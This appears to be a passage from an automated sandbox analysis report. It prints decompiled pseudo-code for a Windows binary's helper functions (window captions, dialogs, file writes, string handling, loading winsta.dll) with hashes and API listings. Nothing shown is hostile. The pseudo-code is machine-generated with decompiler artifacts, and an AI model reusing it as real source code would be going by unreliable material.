                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                                                                  0x00405e0a
                                                                                                                                                                  0x00405e12
                                                                                                                                                                  0x00405e18
                                                                                                                                                                  0x00405e1c
                                                                                                                                                                  0x00405e1e
                                                                                                                                                                  0x00405e1e
                                                                                                                                                                  0x00405e24
                                                                                                                                                                  0x00405e2c
                                                                                                                                                                  0x00405e2e
                                                                                                                                                                  0x00405e44
                                                                                                                                                                  0x00405e49
                                                                                                                                                                  0x00405e4c
                                                                                                                                                                  0x00405e4d
                                                                                                                                                                  0x00405e68
                                                                                                                                                                  0x00405e74
                                                                                                                                                                  0x00405e74
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405e84
                                                                                                                                                                  0x00405e8c

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                  • String ID: caption
                                                                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                                                                  0x00409a4a
                                                                                                                                                                  0x00409a4f
                                                                                                                                                                  0x00409a56
                                                                                                                                                                  0x00409a5e
                                                                                                                                                                  0x00409a60
                                                                                                                                                                  0x00409a6e
                                                                                                                                                                  0x00409a6e
                                                                                                                                                                  0x00409a60
                                                                                                                                                                  0x00409a71
                                                                                                                                                                  0x00409a76
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409a78
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409a89

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid,?,Y@,00409BF0,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409A68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                                                                  • API String ID: 946536540-379566740
                                                                                                                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                                  0x0040588e
                                                                                                                                                                  0x0040588f
                                                                                                                                                                  0x0040588f
                                                                                                                                                                  0x00405892
                                                                                                                                                                  0x00405896
                                                                                                                                                                  0x004058a9
                                                                                                                                                                  0x004058a9
                                                                                                                                                                  0x004058ad
                                                                                                                                                                  0x004058af
                                                                                                                                                                  0x004058b5
                                                                                                                                                                  0x004058b6
                                                                                                                                                                  0x004058b9
                                                                                                                                                                  0x004058c2
                                                                                                                                                                  0x004058c3
                                                                                                                                                                  0x004058c8
                                                                                                                                                                  0x004058d2
                                                                                                                                                                  0x004058d4
                                                                                                                                                                  0x004058d9
                                                                                                                                                                  0x004058e0
                                                                                                                                                                  0x004058ea
                                                                                                                                                                  0x004058ec
                                                                                                                                                                  0x004058ed
                                                                                                                                                                  0x004058f2
                                                                                                                                                                  0x004058f9
                                                                                                                                                                  0x00405902
                                                                                                                                                                  0x00405898
                                                                                                                                                                  0x00405898
                                                                                                                                                                  0x0040589a
                                                                                                                                                                  0x0040589c
                                                                                                                                                                  0x004058a1
                                                                                                                                                                  0x004058a2
                                                                                                                                                                  0x004058a5
                                                                                                                                                                  0x004058a7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004058a7
                                                                                                                                                                  0x00405912
                                                                                                                                                                  0x00405915
                                                                                                                                                                  0x0040591e
                                                                                                                                                                  0x0040591e
                                                                                                                                                                  0x00405907
                                                                                                                                                                  0x0040590b

                                                                                                                                                                  APIs
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004058C3
                                                                                                                                                                  • memset.MSVCRT ref: 004058D4
                                                                                                                                                                  • memcpy.MSVCRT(0040F28C,?,00000000,00000000,00000000,00000000,00000000,?,?,00402ADD,?,?,?,?,0040DE40,0000000C), ref: 004058E0
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004058ED
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                                                                  0x0040ad06
                                                                                                                                                                  0x0040ad0a
                                                                                                                                                                  0x0040ad0c
                                                                                                                                                                  0x0040ad14
                                                                                                                                                                  0x0040ad19
                                                                                                                                                                  0x0040ad1f
                                                                                                                                                                  0x0040ad23
                                                                                                                                                                  0x0040ad27
                                                                                                                                                                  0x0040ad2a
                                                                                                                                                                  0x0040ad2d
                                                                                                                                                                  0x0040ad34
                                                                                                                                                                  0x0040ad3b
                                                                                                                                                                  0x0040ad3e
                                                                                                                                                                  0x0040ad44
                                                                                                                                                                  0x0040ad48
                                                                                                                                                                  0x0040ad4a
                                                                                                                                                                  0x0040ad52
                                                                                                                                                                  0x0040ad5a
                                                                                                                                                                  0x0040ad64
                                                                                                                                                                  0x0040ad65
                                                                                                                                                                  0x0040ad6b
                                                                                                                                                                  0x0040ad6c
                                                                                                                                                                  0x0040ad73
                                                                                                                                                                  0x0040ad76
                                                                                                                                                                  0x0040ad7c
                                                                                                                                                                  0x0040ad7c
                                                                                                                                                                  0x0040ad7f
                                                                                                                                                                  0x0040ad84

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3917621476-0
                                                                                                                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                                                                  0x00404a62
                                                                                                                                                                  0x00404a6a
                                                                                                                                                                  0x00404a6e
                                                                                                                                                                  0x00404a71
                                                                                                                                                                  0x00404a74
                                                                                                                                                                  0x00404a92
                                                                                                                                                                  0x00404a92
                                                                                                                                                                  0x00404a76
                                                                                                                                                                  0x00404a76
                                                                                                                                                                  0x00404a87
                                                                                                                                                                  0x00404a90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404a90
                                                                                                                                                                  0x00404aa3
                                                                                                                                                                  0x00404aa7
                                                                                                                                                                  0x00404aa7
                                                                                                                                                                  0x00404a94
                                                                                                                                                                  0x00404a98

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                                                                  0x004072e0
                                                                                                                                                                  0x004072f7
                                                                                                                                                                  0x004072fd
                                                                                                                                                                  0x00407316
                                                                                                                                                                  0x00407342

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004072FD
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                                                                  • strlen.MSVCRT ref: 00407328
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                                                                  0x00408dd0
                                                                                                                                                                  0x00408dd2
                                                                                                                                                                  0x00408de2
                                                                                                                                                                  0x00408df4
                                                                                                                                                                  0x00408e01
                                                                                                                                                                  0x00408e1b
                                                                                                                                                                  0x00408e21
                                                                                                                                                                  0x00408e28
                                                                                                                                                                  0x00408e30
                                                                                                                                                                  0x00408dd4
                                                                                                                                                                  0x00408dd8
                                                                                                                                                                  0x00408dd8

                                                                                                                                                                  APIs
                                                                                                                                                                  • memcpy.MSVCRT(0040F5C8,?,00000050,?,00402B24,?), ref: 00408DE2
                                                                                                                                                                  • memcpy.MSVCRT(0040F2F8,?,000002CC,0040F5C8,?,00000050,?,00402B24,?), ref: 00408DF4
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
                                                                                                                                                                  • DialogBoxParamW.USER32 ref: 00408E1B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1386444988-0
                                                                                                                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                                                                  0x004050e1
                                                                                                                                                                  0x004050ec
                                                                                                                                                                  0x004050ee
                                                                                                                                                                  0x004050f5
                                                                                                                                                                  0x004050ff
                                                                                                                                                                  0x00405114
                                                                                                                                                                  0x00405118
                                                                                                                                                                  0x00405123
                                                                                                                                                                  0x00405128
                                                                                                                                                                  0x00405101
                                                                                                                                                                  0x00405109
                                                                                                                                                                  0x0040510f
                                                                                                                                                                  0x0040512e

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$wcscatwcsncat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 291873006-0
                                                                                                                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                                                                  0x00402de0
                                                                                                                                                                  0x00402de2
                                                                                                                                                                  0x00402dec
                                                                                                                                                                  0x00402def
                                                                                                                                                                  0x00402dfb
                                                                                                                                                                  0x00402e0c
                                                                                                                                                                  0x00402e0e
                                                                                                                                                                  0x00402e0e
                                                                                                                                                                  0x00402e16
                                                                                                                                                                  0x00402e18
                                                                                                                                                                  0x00402e1a
                                                                                                                                                                  0x00402e21

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                  • GetWindow.USER32 ref: 00402E07
                                                                                                                                                                  • GetWindow.USER32 ref: 00402E0A
                                                                                                                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32(?,?), ref: 00402DA8
